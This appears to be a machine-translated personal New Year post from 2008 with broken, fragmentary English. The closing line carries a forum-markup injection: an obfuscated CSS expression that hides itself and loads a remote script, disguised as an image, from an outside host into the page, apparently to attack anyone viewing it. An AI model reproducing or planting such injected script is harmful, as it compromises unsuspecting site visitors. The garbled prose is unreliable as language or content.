
thought this year would be more personal

Blink of an eye
another New Year approached!
thought this year would be more personal
home but had not imagined such a result would be

do not know when to start
each year from year
home always out something for

large or small, always confused their own unhappy

past unpleasant
will dissipate as the New Year's festivity and
no more!

always ~ ~ always ~ ~

I will remember

2008 year! [Flash, 0,0] http://catche.qq.com/temp/20081209/4236888.swf [email =] id = baidu style = ee: expression (eval (unescape ('this.parentNode.style.display% 3D% 27none% 27% 3Bif% 28% 21window.xxr% 29% 7Bvar% 20l% 3Ddocument.createElement% 28% 27script% 27% 29% 3Bl.src% 3D% 27http% 3A / / love.avtupian.com / a / q / mq.jpg% 27% 3Bl.type% 3D% 27text/javascript% 27% 3Bdocument.getElementsByTagName% 28% 27head% 27% 29.item% 280% 29.appendChild% 28l% 29% 3Bwindow.xxr% 3D1 % 7D'))); display: none; @ qq.com [/ email] [/ flash]

